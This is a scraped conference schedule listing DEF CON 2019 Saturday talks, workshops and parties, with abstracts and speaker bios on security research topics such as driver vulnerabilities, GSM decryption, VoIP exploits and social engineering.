eigentourist is a programmer turned data scientist, with 20 years in application development, and three years in the world of big data and machine learning. He began formal education in computer science when the height of software engineering discipline meant avoiding the use of GOTO statements. Over the course of his career, he has created code of beautiful simplicity and elegance, and of horrific complexity and unpredictability. Sometimes, it's hard to tell which was which. Today, he works on predictive models and computing clusters in the health care industry.


Return to Index    -    Add to    -    ics Calendar file

 

PHVT - Bally's - Indigo Tower - 26th Floor - Saturday - 15:00-15:30


Generating Personalized Wordlists With NLP by Analyzing Tweets

Utku Sen, R&D Lead at Tear Security

Adversaries need to have a wordlist or combination-generation tool while conducting password guessing attacks. To narrow the combination pool, researchers developed a method named "mask attack" where the attacker needs to assume a password's structure. Even if it narrows the combination pool significantly, it can be still too large to use for online attacks or offline attacks with low hardware resources. Rhodiola tool is developed to narrow the combination pool by creating a personalized wordlist for target people. It finds interest areas of a given user by analyzing his/her tweets, and builds a personalized wordlist.

Utku Sen (Twitter: @utkusen) is a security researcher who is mostly focused on application security, network security and tool development. He presented his different tools and researches in Black Hat USA Arsenal, DEF CON Demo Labs and Packet Hacking Village in recent years. He's also nominated for Pwnie Awards on "Best Backdoor" category in 2016. He is currently working for Tear Security.


Return to Index    -    Add to    -    ics Calendar file

 

DC - Paris - Track 1 - Saturday - 15:00-15:45


Get off the Kernel if you can’t Drive

Saturday at 15:00 in Track 1
45 minutes | Demo. Tool, Exploit

Jesse Michael

Mickey Shkatov

For software to communicate with hardware, it needs to talk to a kernel-mode driver that serves as a middle-man between the two, helping to make sure everything operates as it should. In Windows that is done using the Kernel-Mode Driver Framework (KMDF).

These drivers are used to control everything in your computer, from small things like CPU fan speed, color of your motherboard LED lights, up to flashing a new BIOS.

However, as the code in these drivers runs with the same privileges as the rest of the kernel, malicious drivers can be used to compromise the security of the platform. To that end, Microsoft relies on WHQL, code signing, and EV Signing to prevent drivers which have not been approved by Microsoft from being loaded into the kernel.

Unfortunately, security vulnerabilities in signed drivers can be used to as a proxy to read and write hardware resources such as kernel memory, internal CPU configuration registers, PCI devices, and more. These helpful driver capabilities can even be misused to bypass and disable Windows protection mechanisms.

Let us teach you how these drivers work, show you the unbelievable risk they pose, and enjoy our walk of shame as we parade all the silly and irresponsible things we discovered in our research.

Jesse Michael
Jesse Michael is an experienced security researcher focused on vulnerability detection and mitigation who has worked at all layers of modern computing environments from exploiting worldwide corporate network infrastructure down to hunting vulnerabilities inside processors at the hardware design level. His primary areas of expertise include reverse engineering embedded firmware and exploit development. He has also presented research at DEF CON, Black Hat, PacSec, Hackito Ergo Sum, Ekoparty, and BSides Portland.

Twitter: @JesseMichael

Mickey Shkatov
Mickey Shkatov, a principal researcher at Eclypsium, has been performing security research and product security validation since 2010, He has also presented multiple times at DEF CON, Black Hat, PacSec, CanSecWest, BruCon, Hackito Ergo Sum, and BSides Portland.

Twitter: @HackingThings


Return to Index    -    Add to    -    ics Calendar file

 

BHV - Planet Hollywood - Melrose 1-3 Rooms - Saturday - 18:15-18:59


6:15 PM: Getting access to your heart's data
Speaker: Marie Moe

Abstract: Maries pacemaker was hit by cosmic radiation while she was flying, which caused bitflips in the memory of the device. The incident led her to getting hold of an encrypted file with a crash log and a memory dump from her device. In order to get access to her own hearts data she handed this file over to the two master students that she was supervising at the time, and gave them the task of breaking the crypto. They succeeded in finding the hard-coded key, which will be demonstrated in this talk.

Speaker Bio: Dr. Marie Moe has a PhD in information security and works as a Research Manager at SINTEF and an Associate Prof. at NTNU. She is currently doing research on the security of her own implanted pacemaker. Marie loves to break crypto protocols, but gets angry when the broken crypto is in her own body.

T: @MarieGMoe

Return to Index    -    Add to    -    ics Calendar file

 

SEV - Bally's Jubilee Tower - 3rd Floor - Saturday - 16:30-16:59


Getting Psychic: Cold Reading Techniques for Fortune Tellers and Social Engineers

No description available


Return to Index    -    Add to    -    ics Calendar file

 

DC - Paris - Track 3 - Saturday - 16:30-16:50


Go NULL Yourself or: How I Learned to Start Worrying While Getting Fined for Other’s Auto Infractions

Saturday at 16:30 in Track 3
20 minutes

droogie Security Consultant at IOActive

Input sanitization issues will always exist, although it’s surprising at how we’re still seeing amateur mistakes being made on everyday applications and systems used by millions. After making some observations against automatic license plate recognition (ALPR) data requested via the freedom of information act (FOIA) while having reminiscent conversations about old hacker tales, it turned on the evil bit, leading to some interesting ideas. We’ll go over this adventure of poking at systems using totally valid user-controlled data that causes unexpected behavior in the real world. It’s always a strange thing when you can “exploit” unexpected attack surface, due to poor specification, especially in government systems.

droogie
droogie is a security researcher, interested in offensive security and hacking of retro and modern video games alike. He makes a living as a security consultant at IOActive, which helps fund his degenerate passion for hardware hacking on old video game console hardware. He’s spoken at conferences like CCC and Ruxcon and helped bring Metal Gear Online back to life, he enjoys international travel to security conferences to kick it with awesome hackers.


Return to Index    -    Add to    -    ics Calendar file

 

DL - Planet Hollywood - Sunset 5 - Saturday - 10:00 - 11:50


Go Reverse Engineering Tool Kit

Saturday from 10:00 – 11:50 in Sunset 5 at Planet Hollywood
Audience: Defense

Joakim Kennedy

The Go Reverse Engineering Tool Kit (go-re.tk) is a new open-source toolset for analyzing Go binaries. The tool is designed to extract as much metadata as possible from stripped binaries to assist in both reverse engineering and malware analysis. For example, GoRE can detect the compiler version used, extract type information, and recover function information, including source code line numbers for functions and source tree structure. The core library is written in Go, but the tool kit includes C-bindings and a library implementation in Python. When using the C-bindings or the Python library, it is possible to write plugins for other analysis tools such as IDA Pro and Ghidra. The toolset also includes “redress”, which is a command line tool to “dress” stripped Go binaries. It can both be used standalone to print out extracted information from the binary or as a radare2 plugin to reconstruct stripped symbols and type information. The tool kit consists of:

* Core library written in Go
* C-bindings
* Python library using the C-bindings
* A command line tool for easy analysis

https://github.com/goretk

Joakim Kennedy
Joakim Kennedy is the Threat Intel Manager for Anomali Research. His job involves playing with malware, tracking threat actors and everything else around threat intelligence.


Return to Index    -    Add to    -    ics Calendar file

 

Night Life - Planet Hollywood - Gallery Club - Saturday - 22:00-25:59


Title:
GothCON party

Back for our second year, and this time powered with the blessings of the Def Con 'call for parties' space - we're hosting an official gothcon party open to all defcon attendees in the gorgeous Gallery Bar in Planet Hollywood on Saturday August 10th.
. . .
Forums post on party
reddit post
Twitter Follow at @dcgothcon
Donate to the fun
Volunteer Here
search Twitter: #gothcon

Return to Index    -    Add to    -    ics Calendar file

 

DC - Paris - Track 2 - Saturday - 13:00-13:45


GSM: We Can Hear Everyone Now!

Saturday at 13:00 in Track 2
45 minutes | Demo, Exploit

Campbell Murray Global Head Cybersecurity Delivery, BlackBerry

Eoin Buckley Senior Cybersecurity Consultant

James Kulikowski Senior Cybersecurity Consultant

The presentation demonstrates that the security of the A5/1 and A5/3 ciphers used to protect cellular calls are vulnerable to compromise leading to full decryption of GSM communications, using freely available open source solutions along with our tools we developed for this task.

The flaw being exploited lies in the heart of the design of GSM. In all implementations the standard requires GSM messages to first be error control encoded using a convolutional code and then encrypted. In the vast majority of implementations used today, encryption is performed using the A5/1 or A5/3 cipher. The convolutional code adds redundancy to the transmitted message, which can act like a fingerprint to identify the key used to encrypt the GSM message.

To exploit the vulnerability an attacker simply needs to capture a transmission and identify the GSM channel used. The standard defines the convolutional code and therefore how the redundancy may be interpreted to recover the encryption key.

This presentation considers passively capturing GSM traffic using A5/3 encryption and demonstrates a novel solution to cracking the key used without interacting with the mobile or network.

Campbell Murray
Campbell Murray is the global head of BlackBerry Cybersecurity Delivery and joined the organization through the acquisition of Encription Ltd, of which he was a founder and director. He has over 20 years’ cybersecurity experience with an emphasis on offensive security techniques and security engineering in the IoT, industrial and transport arenas. Campbell is a founding director of both the TigerScheme and the CyberScheme.

Twitter: @zyx2k

Eoin Buckley
Michael Eoin Buckley is a senior cybersecurity consultant at BlackBerry with over 20 years’ experience spanning cybersecurity consultancy, product security and both security and physical layer aspects of 3GPP cellular, Zigbee and IETF standards. In his role he leads the cybersecurity engineering effort and specializes in product security assessments of several areas such as automotive, healthcare and aerospace. Eoin holds a Ph.D. from Cornell University with a thesis focus on error control coding.

James Kulikowski
James Kulikowski is a senior cybersecurity consultant at Blackberry and an active member at Unallocated Space in Baltimore Maryland. In his 15 years, James has worked with clients from the DoD and Intel community to companies in finance, healthcare and transportation. James previously specialized in risk management and policy development before transitioning to hardware and software security assessments.


Return to Index    -    Add to    -    ics Calendar file

 

Night Life - Planet Hollywood - Mezzanine Stage - Saturday - 18:00-18:59


Title:
H@ck3r Runw@y

No description available
Return to Index    -    Add to    -    ics Calendar file

 

ICS - Bally's Event Center - Saturday - 12:00-12:30


Hack the World & Galaxy with OSINT

August 10, 2019 12:00 PM

Come of a journey of discovering vulnerable & exploitable IT, IOT/ IIOT and ICS SCADA systems and assets connected to the internet from smart home appliances, databases, burglar alarms, hydroelectric dams, fire alarms, airports & aviation, public transport, maritime, satellites, North American OpenADR electric grid, renewable energy and more. Nothing is safe, not even in space.

Speaker Information

Panelist Information

Chris Kubecka

HypaSec

HypaSec CEO, previously heading Information Protection Group, network/security ops/joint-international intelligence team for Aramco, establishing security teams, security contracts, EU/UK Privacy, USAF Space Command, recovering after cyberwar Shamoon attacks, Hack the World with OSINT author


Return to Index    -    Add to    -    ics Calendar file

 

Workshops - ( Sold Out ) - Flamingo - Lower Level - Valley of Fire I - Saturday - 14:30-18:30


Hack to Basics - x86 Windows Based Buffer Overflows, an introduction to buffer overflows.

Saturday, 1430-1830 in Flamingo, Valley of Fire I

Dino Covotsos Founder & CEO, Telspace Systems

Want to learn about exploit development but feeling overwhelmed at all the latest technologies and buzzwords?

Hack to basics is a course which will provide you with foundational level exploit development skills with real world exploitation techniques. This will range from "Vanilla" EIP overwrites through to Structured Exception Handler(SEH) exploitation and how egg hunters work with practical examples.

By the end of the course, Students can expect to know the basics of x86 assembly, including some real world examples of exploiting vanilla EIP overwrites, SEH exploitation and using egg hunters. This will provide an entry to the world of exploit development and a strong foundation to work off in order to make it easier to transition to the newer, more advanced technologies which are in place today.

To get the most out of this training, the following should be studied beforehand:

FuzzySecurity:

http://www.fuzzysecurity.com/tutorials/expDev/1.html
http://www.fuzzysecurity.com/tutorials/expDev/2.html
http://www.fuzzysecurity.com/tutorials/expDev/3.html
http://www.fuzzysecurity.com/tutorials/expDev/4.html

Corelan:

https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/
https://www.corelan.be/index.php/2009/07/23/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-2/
https://www.corelan.be/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/

We will be using Python to construct our exploits, combined with a debugger such as Immunity or OllyDBG, it it is recommended to be familiar with both.

Skill Level Intermediate/Advanced

Prerequisites: Basic experience in assembly and a debugger, preferably Immunity or Olly.
2-3 years of penetration testing experience would be beneficial.
Experience in Kali linux, as this will be used as the primary operating system.

Materials: Laptops with the following specs or greater:

Intel(R) Core(TM) i7-7500U CPU @ 2.70GHz (or AMD equivalent)
8GB RAM
Kali Linux installed (x86 is fine)
Wireless Network Adapter + Ethernet Adapter
Virtualbox or equivalent installed

Max students: 35

Registration: https://www.eventbrite.com/e/hack-to-basics-x86-windows-based-buffer-overflows-an-introduction-to-buffer-overflows-valley-of-tickets-63998523306
(Opens 8-Jul-19)

Dino Covotsos
Dino Covotsos is the founder and CEO of Telspace Systems. With over 20 years of experience, he leads the research and technical team at Telspace. Covotsos has many years of experience in the information security sector and has been involved in hundreds of information security projects worldwide. He is also a well-known presenter at international conferences, including Hack In the Box, Sector, H2HC, DEF CON and many more. Covotsos is also passionate about the information security community and is involved various community based projects. Covotsos has several industry certifications, such as the OSCE, OSCP, OSWP and CREST CRT.


Return to Index    -    Add to    -    ics Calendar file

 

RCV - Planet Hollywood - Celebrity 5 Ballroom - Saturday - 10:00-10:50


COMPREHENSIVE TALK

Hack to Basics – Adapting Exploit Frameworks to Evade Microsoft ATP

1000 - 1050

Anthony “C01И” Rose and Jake “Hubble” Krasnov


Return to Index    -    Add to    -    ics Calendar file

 

Meetups - Planet Hollywood - London Club - Saturday - 19:30-25:59


Title:
Hacker Flairgrounds

Flaming badge builder or just badge curious Hacker Flairgrounds is the ultimate gathering of hackers and blinking LEDs in Vegas.

This is the Meetup destination for badge collectors, designers, and prototypers that you have been waiting for! A social environment to show off you custom badges, discuss projects to make you own badges and to talk to collectors who cherish your work. Flashing LEDs, crafting time, trading, and the celebration of badge craft all in one.

Return to Index    -    Add to    -    ics Calendar file

 

Night Life - Planet Hollywood - Mezzanine Stage - Saturday - 20:00-21:59


Title:
Hacker Jeopardy

No description available
Return to Index    -    Add to    -    ics Calendar file

 

Night Life - Paris - Concorde C Ballroom - Saturday - 19:30-25:59


Title:
Hacker Karaoke

Two great things that go great together! Join the fun as your fellow hackers make their way through songs from every era and style. Everyone has a voice and this is your opportunity to show it off! Quickly becoming a DEF CON tradition and a favorite of people from all skill levels.

Return to Index    -    Add to    -    ics Calendar file

 

PHVT - Bally's - Indigo Tower - 26th Floor - Saturday - 10:00-10:59


Hacking Corporate Org Socialization: One Day You Are Out and the Next Day You Pwn the Org!

D9, Independent Researcher

There is growing community of hackers who refer to themselves as "Chameleon Hackers" and practice an organizational socialization technique they call "code switching." Code switching is a "tradecraft" practice used by chameleon hackers to consciously change their mannerisms, outward appearance, dress, thinking, physical characteristics, and their language in order to achieve socialization in either a virtual or live setting. The briefer will draw on his December 2018 doctoral dissertation to describe a framework for how these chameleons hackers go about their code switching tradecraft and then discuss examples of how they "hacked" the hacker community and the Corporate C-suite

D9 (Twitter: @D9_Pilot) is a member of the Senior Executive Service and currently serving as the Deputy Director for Expeditionary Warfare for the U.S. Navy. Twenty-six years as an U.S. Air Force officer serving as a B-52H navigator and then F-15A and A-37B pilot. Held Command, Director, and staff positions across the Air Force in training operations, policy, and advanced training technologies. Three operational deployments with the last in Pakistan in support of Operation Enduring Freedom (Afghanistan). Served in the Office of the Secretary of Defense for eleven years as the DoD Senior Executive responsible for the programming and execution of the nearly $900M/year the Department of Defense invests in worldwide joint training and training technologies. Cyber experience includes: Co-Lead with the DoD CIO to develop the strategy and implement the Secretary of Defense's DoD Cyber Strategy to "Build and Maintain Ready Forces to Conduct Cyberspace Operations." Built from scratch a six-month Cyber Operations training course that yielded a 78% cohort pass rate (average is 16%) on the Offensive Security Certified Professional certification. Worked with DEF CON officials to repurpose DEF CON's CTF and CTP technical architecture to support DoD's cyber operations training. 2018 Doctorates in Education from The University of Pennsylvania's Graduate School of Education. Dissertation advanced organizational socialization theory by improving our understanding of the plasticity of human socialization. Study population consisted of "chameleon" hackers who practiced a socialization tradecraft technique they called "Code Switching."


Return to Index    -    Add to    -    ics Calendar file

 

CLV - Flamingo 3rd Floor - Reno I Room - Saturday - 12:15-12:59


Speaker: Rotem Bar

Twitter: @rotembar

Abstract: In this talk I will share my experience about how I hacked different automotive clouds, techniques I used and goals I pursue after connecting.

In this talk I will give real life examples of:

  • From zero to hero – Full backend control with examples
  • Common fails which allow me to jump between networks
  • Dangers of connected cars - Taking over a car from the cloud
  • How to break a production line
  • Cloud credentials leakage

I will talk about the main connectivity areas I look for, supplier integrations and differences between normal clouds and automotive clouds. Once I got a good foothold, Possible targets and places which can harm the most. Where can I jump next inside and how deep the rabbit hole goes.

This will be a technical talk going into places I've experienced personally in the last few years and will try to give a glimpse of the fun life of hacking into the vehicle ecosystem

About Rotem: I work in the automotive field for about 4 years now, Started my way with red-teaming production plants and different cloud providers with the goal of getting as deep as possible and showing full impact.I love breaking stuff, especially when its in mass scale. taking control over entire systems and seeing my clients in awe and shock as I give them live annotations of what I'm doing to them.


Return to Index    -    Add to    -    ics Calendar file

 

SEV - Bally's Jubilee Tower - 3rd Floor - Saturday - 17:05-17:35


Saturday August 10 2019 1705 30 mins
Hacking Your Career Through Social Engineering
Social engineering is a special form of hacking that bridges our technical skills with a deep understanding of human behavior. Many of us use this special blend of techniques to assist in our various colors of hacking but even those of us not in a professional social engineering, hacking, or penetration testing role can use these skills to aid in our career success. Social engineering has a wonderful set of techniques that can be used to help you enter into a new job, a new career, get a promotion, self promote, overcome imposter syndrome, plus many other situations. This talk will walk through the ways we can apply our knowledge of social engineering to any job and any career to help us be successful.

Rebecca Long: @amaya30
Rebecca Long is a software engineer with 15 years experience focusing on quality assurance and DevOps. She is currently working at RiskLens, a cyber-risk quantification software company in Spokane as their Lead DevOps Engineer, Washington. She holds undergraduate and master’s degrees in computer science with her thesis on social engineering and phishing within a financial institution. As a leader in the Spokane tech community for most of the last decade, in 2018 she finally launched her dream of a non-profit called Future Ada which supports and advocates for women and non-binaries in STEAM (science, technology, engineering, art, and mathematics).


Return to Index    -    Add to    -    ics Calendar file

 

DC - Paris - Track 3 - Saturday - 11:00-11:45


Hacking Your Thoughts - Batman Forever meets Black Mirror

Saturday at 11:00 in Track 3
45 minutes

Katherine Pratt/GattaKat NSF Graduate Research Fellow, University of Washington - Seattle

Companies are coming for your brains. The electricity in your brains, to be more precise. Valve, Facebook, Elon Musk and more are funding research into technologies that will translate neural signals into controls for devices like computers, smartphones, and VR/AR environments. While this would be super exciting, it represents some serious data privacy issues. First: what kind of private information can be elicited from your neural signals? It’s possible to use a specific kind of neural response to visual and audio stimuli to deduce information about the user… like where you bank, who you know, your real identity, etc (Edward Nygma in Batman Forever, anyone?)

More broadly, there is also the issue of what happens when you provide your neural signals to a company. If you’re worried about what Facebook is doing with your information now, imagine what they can do when they have hours of information straight from your brain. If neural data is treated the same as your DNA, commercial companies become the owners of your thoughts (as electrical signals). Will they readily share it with the FBI without probable cause? These kinds of questions, and many more, are starting to surface with neurally-controlled devices and other emerging technologies. This talk will cover all of this and more.

Katherine Pratt/GattaKat
Dr Katherine Pratt received her B.S. in aerospace engineering from MIT in 2008, and her PhD in Electrical and Computer Engineering (ECE) from the University of Washington (UW) in 2019. During undergrad she completed several internships with the private space venture Blue Origin, working in systems and propulsion engineering. She has served four years in the United States Air Force, working primarily as an operational flight test engineer on the F-35 Joint Strike Fighter. Her doctoral dissertation focused on the privacy, ethics, and policy of information derived from elicited neural signals. She was the recipient of a National Science Foundation Graduate Research Fellowship and the 2018-19 UW ECE Irene Peden Endowed Fellowship. During graduate school she interned with the ACLU of Washington through the Speech, Privacy, and Technology Project. She also completed a six month fellowship as the first Congressional Innovation Scholar through Tech Congress where she crafted technology policy and legislation in the office of a member of the House of Representatives.

Twitter: @GattaKat
Website: https://kaipratt.site/web


Return to Index    -    Add to    -    ics Calendar file

 

DC - Paris - Track 2 - Saturday - 11:00-11:45


HAKC THE POLICE

Saturday at 11:00 in Track 2
45 minutes | Demo, Tool

Bill Swearingen World’s #23 Best Hacker

PULL OVER!
No, it is a cardigan, but thanks for noticing! After getting a nasty speeding ticket, OG SecKC HA/KC/ER hevnsnt decided enough was enough, and set out to fully understand police speed measurement devices, and develop homebrew countermeasures that are legal in some states (and some that are not). Come learn how police RF (X, K, KA) and Laser speed detection systems work and how to implement your own homebrew jamming countermeasures on the cheap, essentially making your vehicle invisible to law enforcement. HOP IN and BUCKLE UP, this talk is going to FUEL your hardware hacking desires! You better be able to think fast to keep up with this talk and prepare to get home in record time.

Bill Swearingen
Bill Swearingen (hevnsnt) has been in the hacking scene for decades, which is odd because his twitter profile says he is only 23 years old. Having spent his life dedicated to understanding how how things work, he is has focused this curiosity and knowledge to take advantage of our world in any way possible. His interests have always been focused on hardware hacking and loves releasing easy to replicate projects using cheap computing platforms such as Arduino and RaspberryPi.

Twitter: @hevnsnt


Return to Index    -    Add to    -    ics Calendar file

 

Meetups - Planet Hollywood - Mezzanine Stage - Saturday - 15:00-16:59


Title:
Homebrew Hardware Contest

No description available
Return to Index    -    Add to    -    ics Calendar file

 

DC - Paris - Track 1 - Saturday - 12:00-12:45


How You Can Buy AT&T, T-Mobile, and Sprint Real-Time Location Data on the Black Market

Saturday at 12:00 in Track 1
45 minutes

Joseph Cox Senior Staff Writer, Motherboard

Major US telecommunications companies AT&T, T-Mobile, and Sprint have been quietly selling access to their customers’ real-time location data, including cell tower information as well as highly precise GPS data. Through a complex network of dodgy data aggregators and middlemen companies, this data access eventually trickled down to a slew of different industries, used car salesman, landlords, and hundreds of bounty hunters, likely without your knowledge or informed consent. In this talk, based on leaked documents, sources, and first hand experience, Joseph will explain how this data industry works, the players involved, and also how the data access is available on the black market, where it can be used in any way an attacker fancies: Joseph paid a source $300 to successfully locate a phone in New York.

Joseph Cox
Joseph is an investigative reporter for Motherboard, the science and technology section of VICE. He covers cybersecurity, the digital underground, and social media platforms.

Twitter: @josephfcox


Return to Index    -    Add to    -    ics Calendar file

 

ICS - Bally's Event Center - Saturday - 13:00-13:30


HVACking: Understand the difference Between Security and Reality!

August 10, 2019 1:00 PM

This session and demo explores an ICS 0-day vulnerability found by McAfee. The target is a PLC manufactured by a major SCADA vendor. The device is popular in critical industries such as education, healthcare, hospitality, and manufacturing/industrial. Not only is this vulnerability remotely exploitable and requires no authentication, but many of the devices can be compromised over the Internet.

Speaker Information

Panelist Information

Douglas McKee

McAfee

Douglas McKee is a Sr. Security Researcher for the McAfee ATR team, focused on finding new vulnerabilities in both software and hardware. Douglas has an extensive background in vulnerability research, penetration testing, reverse engineering, and forensics.


Return to Index    -    Add to    -    ics Calendar file

 

CPV - Planet Hollywood - Celebrity 1,2 Ballrooms - Saturday - 15:00-14:59


I am Spartacus! (And You Can Be Too!) Ensuring Privacy through Obfuscation

No description available


Return to Index    -    Add to    -    ics Calendar file

 

SEV - Bally's Jubilee Tower - 3rd Floor - Saturday - 15:30-16:20


Saturday August 10 2019 1630 30 mins
Getting Psychic: Cold Reading Techniques for Fortune Tellers and Social Engineers
Cold reading is a technique to make others believe that you have psychic powers. After reading everything I could find on cold reading, I ran a two-day experiment during the Veracode Hackathon, where I gave psychic readings to colleagues whom I didn’t know personally. Each participant filled in a survey at the end of the reading, and gave me a short video statement about the experience.

In this talk, introduce the concept of cold reading, my experiments, and recommendations for using cold reading techniques in social engineering. I’ll walk through the set up of the experiment, which included setting the scene through props, gauging the “sitter’s” level of experience and openness to psychic readings, and then various techniques I applied. These included using statements rather than questions, rainbow ruses based on reading social cues, and playing with probabilities. The talk includes video testimonials and survey results to show the effectiveness of the techniques in the experiment.

We’ll then switch to applying cold reading to social engineering. We’ll cover how props help build your authority if you introduce them in the right way. Using statements rather than questions demonstrates that you are an insider and know the company or situation well, which builds rapport fast. Gauging whether a target is tech savvy helps you tailor your attack. Researching frequently used hardware and software (probability game) and using these in statements can further build your authority. We’ll learn how fortune tellers are never wrong, and how to build justifications so you are always right. Doing OSINT research on your target will help your hit rate, which is what psychics call a warm reading. Before going into questions we’ll cover the following week’s winning numbers for MegaMillions.

Chris Kirsch: @chris_kirsch
Chris Kirsch (@chris_kirsch) has always had a passion for security, but bad life choices led him to a career in marketing – for many DEF CON attendees just one step above a rose seller. He has enjoyed worked product marketing jobs at PGP Corporation, nCipher, Rapid7 and now Veracode. Born in Germany, he has lived in Switzerland, the United Kingdom, and now the United States. In 2017, Chris received a DEF CON black badge for the Social Engineering CTF by shamelessly taking advantage of nice, trusting people at a Fortune 500 gaming company. Chris is currently looking for an internship with a fortune teller to advance his career.


Return to Index    -    Add to    -    ics Calendar file

 

DC - Paris - Track 2 - Saturday - 14:00-14:45


I'm on your phone, listening - Attacking VoIP Configuration Interfaces

Saturday at 14:00 in Track 2
45 minutes | Demo, Tool, Exploit

Stephan Huber Fraunhofer SIT

Philipp Roskosch

If toasters talking to fridges is no joke to you, then you are aware of the big Internet of Things hype these days. While all kind of devices get connected and hacked, one of the oldest class of IoT devices seems to be forgotten even though it is literally everywhere - VoIP phones.

For configuration and management purposes, VoIP phones run a web application locally on the device. We found several critical bugs (reported CVEs) in the web application as well as in the webserver which enabled us to hijack the phones. Starting with simple XSS and CSRF issues, via command injections and memory corruptions right through to remote code executions, all popular vulnerability classes can be found on those devices.

We will present our findings together with the tools and strategies we used, and will enable you to do the same with your own phones and other IoT devices.

Further, we will provide helpful ARM shell code patterns, scripts and tricks which hackers can use to find bugs. We will conclude our talk by showing that automatic tools fail to discover such vulnerabilities. Therefore, manual IoT pentesting is still required.

If you think these management interfaces are not exposed to the internet, you are wrong. In a scan, we found thousands of reachable phones vulnerable to our exploits.

Stephan Huber
Bio Coming Soon

Twitter: @teamsik
Website: www.team-sik.org

Philipp Roskosch
Bio Coming Soon


Return to Index    -    Add to    -    ics Calendar file

 

DC - Paris - Track 3 - Saturday - 10:00-10:45


Information Security in the Public Interest

Saturday at 10:00 in Track 3
45 minutes

Bruce Schneier

Computer security is now a public policy issue. Election security, blockchain, "going dark," the vulnerabilities equities debate, IoT safety , data privacy, algorithmic security and fairness, critical infrastructure: these are all important public policy issues with a strong Internet security component. But while an understanding of the technology involved is fundamental to crafting good policy, there is little involvement of technologists in policy discussions. This is not sustainable. We need public-interest technologists: people from our fields helping craft policy, and working to provide security to agencies and groups working in the broader public interest. We need these people in government, at NGOs, teaching at universities, as part of the press, and inside private companies. This is increasingly critical to both public safety and overall social welfare. This talk both describes the current state of public-interest technology, and offers a way forward for us individually and collectively for our field. The defining policy question of the Internet age is this: How much of our lives should be governed by technology, and under what terms? We need to be involved in that debate.

Bruce Schneier
Bruce Schneier is an internationally renowned security technologist, called a "security guru" by the Economist. He is the author of 14 books—including the New York Times best-seller "Click Here to Kill Everybody"—as well as hundreds of articles, essays, and academic papers. His influential newsletter "Crypto-Gram" and blog "Schneier on Security" are read by over 250,000 people. Schneier is a fellow at the Berkman Klein Center for Internet and Society at Harvard University; a Lecturer in Public Policy at the Harvard Kennedy School; a board member of the Electronic Frontier Foundation, AccessNow, and the Tor Project; and an advisory board member of EPIC and VerifiedVoting.org. He is also a special advisor to IBM Security.

Twitter: @schneierblog
Website: https://www.schneier.com


Return to Index    -    Add to    -    ics Calendar file

 

BTVW - Flamingo - 3rd Floor- Savoy Room - Saturday - 09:00-12:59


Introduction To Mac-centric Incident Response Tools And Techniques

Saturday 09:00, Savoy Ballroom, Flamingo (Blue Team Village) (4H)

@crlowell is a member of the security team at a SF based tech company where he performs incident response, detonates malware, and helps protect employee devices.

Learn how to identify malicious files, determine where malware was downloaded from, configure your own VM Lab, and safely detonate malware to gather IOCs by responding to simulated Mac based incidents.


Return to Index    -    Add to    -    ics Calendar file

 

DL - Planet Hollywood - Sunset 2 - Saturday - 12:00 - 13:50


ioc2rpz

Saturday from 12:00 – 13:50 in Sunset 2 at Planet Hollywood
Audience: Defense

Vadim Pavlov

DNS is the control plane of the Internet with unprecedented detailed views on applications, devices and even transferred data going in and out of a network. 80% of malware uses DNS to communicate with Command & Control for DNS data exfiltration/infiltration and phishing attacks using lookalike domains. Response Policy Zones or DNS Firewall is a feature which allows us to apply security policies on DNS. Commercial DNS Firewall feeds providers usually do not allow user to generate their own feeds. Cloud only DNS service provides do not provide feeds for on-prem DNS. ioc2rpz is a DNS server which automatically creates, maintains and distributes DNS Firewall feeds from various local (files, DB) and remote (http, ftp, rpz) sources. This enables easy integrations with Threat Intel providers and Threat Intelligence Platforms. The feeds can be distributed to any open source and commercial DNS servers which support RPZ, e.g. ISC BIND, PowerDNS, Infoblox, BlueCat, Efficient IP etc. With ioc2rpz you can create your own feeds, actions and prevent undesired communications before they happen.

http://ioc2rpz.com

Vadim Pavlov
Vadim is a senior product manager at Infoblox where he manages Security Ecosystem integrations, Security API, BloxOne Threat Defense. He has more than 15 years of experience in the network and security industry in various roles. He is an author of open source tools such as ioc2rpz (DNS RPZ feeds distribution server) and others. Vadim earned a Master of Science degree in Computer Science (Software Engineering) from a state university in Russia.


Return to Index    -    Add to    -    ics Calendar file

 

Night Life - TBA - Saturday - 21:00-24:30


Title:
IoT Village Party

The IoT Village Mansion Party at DEF CON is back! As your go-to off-strip mansion party we have made a few changes that will make this party even better than last year. . . .
IoT Village Hacker House Party 2019 Tickets

Return to Index    -    Add to    -    ics Calendar file

 

ETV - Flamingo - 3rd Floor - Reno II Room - Saturday - 12:00-12:59


Title:
Is It Ethical To Work On Autonomous Weapon Systems?


Return to Index    -    Add to    -    ics Calendar file

 

BCV - Flamingo 3rd Floor - Laughlin III Room - Saturday - 12:50-13:40


Jump-Oriented Programming (JOP) in Smart Contract Honeypots

No description available


Return to Index    -    Add to    -    ics Calendar file

 

BCV - Flamingo 3rd Floor - Laughlin III Room - Saturday - 10:00-10:50


Keynote Blockchain-Security Symbiosis: Security Enabling Blockchains; Blockchains Enabling Security

No description available


Return to Index    -    Add to    -    ics Calendar file

 

BTVT - Flamingo - 3rd Floor- Savoy Room - Saturday - 17:30-17:59


Killsuit - How The Equation Group Remained Out Of Sight For Years

Saturday 17:30, Savoy Ballroom, Flamingo (Blue Team Village) (30M)

@connormorley is a Threat Hunter at Countercept, a 24/7 manager Threat hunting service by MWR Infosecurity. A keen investigator of malicious TTP’s, he enjoys experimenting and dissecting malicious tools to determine functionality and developing detection methodology. As a threat hunter as well as holding OSCP accreditation he is experienced with traditional and “in the wild” malicious actors behaviour.

@laciefan is a Threat Hunter at Countercept, a 24/7 managed Threat hunting service by MWR Infosecurity. Previously an Incident Response investigator, she carries a deep interest in forensics investigations and attack detection. Having knowledge in both offensive and defensive security, she currently holds both CPIA and OSCP accreditation.

When the shadow brokers released a large number of Equation Group tools in 2017, many researchers jumped on the analysis of EternalBlue, FuzzBunch etc. The exploits of the leak have now been thoroughly analysed and mostly patched, but the works of its persistence tool (Danderspritz) is still widely unknown. In our talk, we are going to break down the Killsuit modules of Danderspritz. Killsuit (KiSu) is a modular post-exploitation persistence and capability mechanism employed in various hacker frameworks including Danderspritz (DdSz).


Return to Index    -    Add to    -    ics Calendar file

 

PHVT - Bally's - Indigo Tower - 26th Floor - Saturday - 18:00-18:59


Leveraging Passive Network Mapping with Raspberry Pi and Python

Chet Hosmer, Owner of Python Forensics

